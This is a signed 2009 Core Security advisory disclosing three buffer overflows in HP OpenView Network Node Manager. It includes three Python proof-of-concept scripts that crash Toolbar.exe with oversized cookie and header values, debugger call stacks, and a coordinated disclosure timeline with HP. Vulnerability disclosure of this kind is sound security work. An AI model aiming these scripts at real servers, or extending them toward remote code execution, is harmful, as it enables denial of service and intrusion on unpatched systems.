-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

      Core Security Technologies - CoreLabs Advisory
           http://www.coresecurity.com/corelabs/

              HP OpenView Buffer Overflows


1. *Advisory Information*

Title: HP OpenView Buffer Overflows
Advisory ID: CORE-2009-0122
Advisory URL: http://www.coresecurity.com/content/openview-buffer-overflows
Date published: 2009-03-23
Date of last update: 2009-03-23
Vendors contacted: Hewlett-Packard
Release mode: Coordinated release


2. *Vulnerability Information*

Class: Buffer overflow
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 34134, 34135
CVE Name: CVE-2009-0920, CVE-2009-0921


3. *Vulnerability Description*

Several buffer overflows have been found in HP OpenView Network Node
Manager, which can be exploited to remotely compromise a user's system.


4. *Vulnerable packages*

   . HP OpenView Network Node Manager 7.51
   . HP OpenView Network Node Manager 7.53
   . HP OpenView Network Node Manager 7.53 with patch NNM_01195
   . Other versions may be affected.


5. *Vendor Information, Solutions and Workarounds*

The vendor will publish a security bulletin including solution
information [5].


6. *Credits*

These vulnerabilities were discovered and researched by Oren Isacson
from Core Security Technologies.


7. *Technical Description / Proof of Concept Code*

Several buffer overflows have been found in HP OpenView Network Node
Manager, which can be exploited to remotely compromise a user's system.

While working on an exploit for the vulnerabilities disclosed in the
advisory [3], three bugs were found. The stack-based bug found on CGI
parameter 'OvOSLocale' is similar to one of the bugs previously reported
in [3] whereas the two heap-based bugs are different vulnerabilities.

Versions 7.51, 7.53, and 7.53 with patch NNM_01195 were tested and all
of them were vulnerable. The two heap-based buffer overflows are
different vulnerabilities from those exposed publicly on CVE-2008-0067
because the vulnerabilities are not fixed with patch NNM_01195 and are
not mentioned on published advisories.

CVE identification code CVE-2009-0920 was assigned to the
unpatched/variant stack-based overflow related to CVE-2008-0067, and
CVE-2009-0921 was assigned for the two heap overflows. Bugtraq IDs
(BIDs) were assigned: 34134 for 'OvAcceptLang' parameter bug; and 34135
for the 'Accept-Language' HTTP header bug.


7.1. *Stack-based overflow (CVE-2009-0920)*

It is important to remark that the stack-based bug on parameter
'OvOSLocale', that we assumed to be mentioned on published advisories,
is not fixed by the previous patch NNM_01195. Proof of concept follows.

/-----------

import socket,sys
if len(sys.argv)!=3:
    print "USAGE:OvOSLocale.py server port"
else:
    req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie:
OvOSLocale=en_US"+'a'*1400+"; OvAcceptLang=en-usa\n\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    #s.connect(('127.0.0.1',80))
    s.connect((sys.argv[1],int(sys.argv[2])))
    s.send(req)
    print s.recv(4000)

- -----------/

 A debugger was used on a Windows system to see where the 'OvOSLocale'
overflow is located. The call stack shows that '_OVresetLangEnv' in
'ovutil.dll' calls 'ov.sprintf_new' in 'ov.dll' that calls '_vsnprintf'
in 'msvcrt.dll'. The destination buffer of the '_vsnprintf' is located
on the stack, the count is 0x7fff, the format is 'OV_LANG=%s', and the
string is too large for the stack buffer, causing the stack overflow. A
new CVE name was assigned, CVE-2009-0920, marking this bug as unfixed or
variant.


7.2. *Heap-based overflow (CVE-2009-0921, BID 34134)*

Sending HTTP requests to the 'Toolbar.exe' application with large
'OvAcceptLang' cookies causes a buffer overflow. For example the
following Python program causes an access violation on 'Toolbar.exe' if
executed on a windows machine running NNM Admin. The return code of the
web server is '502', signaling an error on the CGI application. Using
similar requests, remote code execution is possible. 'Toolbar.exe' is
just an exploitation path; in the case of parameter 'OvAcceptLang' the
bug is actually located on 'ov.dll' (i.e. on Windows).

/-----------

import socket,sys
if len(sys.argv)!=3:
    print "USAGE:OvAcceptLang.py server port"
else:
    req="GET /OvCgi/Toolbar.exe HTTP/1.0\nCookie: OvOSLocale=en_US;
OvAcceptLang=en-usa"+'a'*1400+"\n\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1],int(sys.argv[2])))
    s.send(req)
    print s.recv(4000)

- -----------/

 A debugger was also used to see where the 'OvAcceptLang' overflow is
located. The program being debugged is 'Toolbar.exe'. This is the call
stack of the '_vsnprintf' function that we think causes the overflow. It
can be seen that the real culprit is located in ovwww.dll. A call is
made to 'sprintf_new' with a destination buffer located in the heap that
is too small to hold the written string.

/-----------

0012724C  00392F98  ASCII "OvAcceptLang"
00127250  006C4BD0  ASCII
"en-usaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"...

Call stack of main thread
Address    Stack      Procedure / arguments                 Called from
Frame
00117214   5A028A26   msvcrt._vsnprintf                     ov.5A028A20
0012723C
00117218   00117234     buffer = 00117234
0011721C   00007FFF     count = 7FFF (32767.)
00117220   5A316680     format = "%s=%s"
00117224   0012724C     arglist = 0012724C
00127240   5A308715   ov.sprintf_new
ovwww.5A30870F                0012723C
00127268   5A308618   ovwww.5A3086D0
ovwww.5A308613                00127264
00127288   5A3081CB   ovwww.5A3085D0
ovwww.5A3081C6                00127284
001272A0   5A30C930   ovwww.setCookie
ovwww.5A30C92B                0012729C
00127308   5A307F26   ovwww.5A30C675
ovwww.5A307F21                00127304
0012792C   00401029   ovwww.?OvWwwInit@@YAXAAHQAPADPBD@Z
Toolbar.00401023              00127928
0012FF50   004013A2   Toolbar.00401000
Toolbar.0040139D              0012FF4C

- -----------/




7.3. *Heap-based overflow (CVE-2009-0921, BID 34135)*

When sending a large 'Accept-Language' HTTP header another heap buffer
is overflowed. This vulnerability could also be used to obtain remote
code execution. On Solaris, the bug is located inside 'libovwww.so.4'
and on Windows inside 'ovwww.dll'.

/-----------

import socket,sys
if len(sys.argv)!=3:
    print "USAGE:AcceptLanguage.py server port"
else:
    req="POST /OvCgi/Toolbar.exe HTTP/1.0\nAccept-Language:
"+'a'*1400+"\nContent-Length:0\nHost:192.168.22.252\n\n"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((sys.argv[1],int(sys.argv[2])))
    s.send(req)
    print s.recv(4000)

- -----------/




8. *Report Timeline*

. 2009-01-07: Secunia publishes an advisory about HP OpenView Network
Node Manager with various CGI stack-based overflows. The identifier
CVE-2008-0067 is assigned [3].
. 2009-01-09: Saint releases to their customers an exploit attacking
OpenView through a CGI parameter [2].
. 2009-01-20: The vendor releases a patch to fix the issues included on
CVE-2008-0067 [4].
. 2009-01-21: Oren Isacson at Core Security Technologies writes an
exploit for a stack-based overflow (CGI parameter 'OvAcceptLang') and
finds two new bugs, one heap overflow on CGI parameter 'OvOSLocale' and
a heap overflow on HTTP header 'Accept-Language'.
. 2009-01-22: Core notifies the vendor that vulnerabilities were found
and that an advisory draft is available.
. 2009-01-22: Vendor acknowledges and requests for an encrypted copy of
the advisory's draft.
. 2009-01-23: Core sends the advisory's draft to the vendor, including
proof of concept code for the OvAcceptLang's bug.
. 2009-01-28: Vendor says the vulnerability can't exist when patch is
installed and asks for confirmation of faulty installation and old
'ov.dll' installed.
. 2009-01-29: Core confirms the vendor that no duplicated 'ov.dll' was
found and that the real culprit for the OvAcceptLang bug is located on
'ovwww.dll'. Detailed debugging information is sent.
. 2009-01-29: Vendor acknowledges the new information.
. 2009-02-05: Core requests an update from the vendor and confirmation
of the tentative schedule of February 16th to publish this information.
. 2009-02-06: Vendor sends an update and requests proof of concept code
for the other two bugs.
. 2009-02-09: Core sends proof of concept code for the three bugs and
requests confirmation or changes on the tentative schedule on February
16th when possible.
. 2009-02-09: Vendor acknowledges the reception of the proof of concept
code.
. 2009-02-16: Core informs the vendor that the publication of the
advisory has been rescheduled to March 8. Core insists that the advisory
should be published as soon as possible.
. 2009-02-19: Vendor informs Core that that hot fix will be available on
March 15 and requests delaying the advisory until March 17.
. 2009-02-19: Core confirms the vendor that the publication of the
advisory will be delayed until March 17.
. 2009-02-19: Vendor acknowledges the new schedule.
. 2009-03-16: Vendor sends to Core the hot fix (for Windows) for
verification.
. 2009-03-16: Core confirms the vendor that the hot fix is avoiding the
three bugs.
. 2009-03-17: Vendor says that it will take time to draft the security
bulletin and coordinate it within HP, and that they will publish their
security bulletin on March 24. Vendor asks Core not to publish the patch
location because that should be published on their security bulletin.
. 2009-03-17: Core re-schedules advisory CORE-2009-0122 publication to
March 24 and asks the vendor the URL of their security bulletin when
available.
. 2009-03-17: Core asks the vendor to reschedule publication to March
23, because March 24 is a working holiday in Argentina, where Core's
research and development center is located.
. 2009-03-17: Vendor confirms March 23 as the new publication date.
. 2009-03-23: Vendor publishes the hot fix.
. 2009-03-23: Core publishes advisory CORE-2009-0122.


9. *References*

[1] Secunia Research 07/01/2009
http://secunia.com/secunia_research/2008-13/
[2] HP OpenView Network Node Manager Toolbar.exe CGI buffer overflow
http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_toolbar
[3] CVE-2008-0067
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0067
[4] HP advisory (HPSBMA02400 SSRT080144)
https://www13.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01646081
[5] HP security bulletin
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01696729


10. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
http://www.coresecurity.com/corelabs.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAknHys0ACgkQyNibggitWa1uoACfWfSGTJjQCfGhYOxwBVbUTAEo
SuAAnAqFoSVhM7q6IcRdqyw6e8LgSFzM
=DVLu
-----END PGP SIGNATURE-----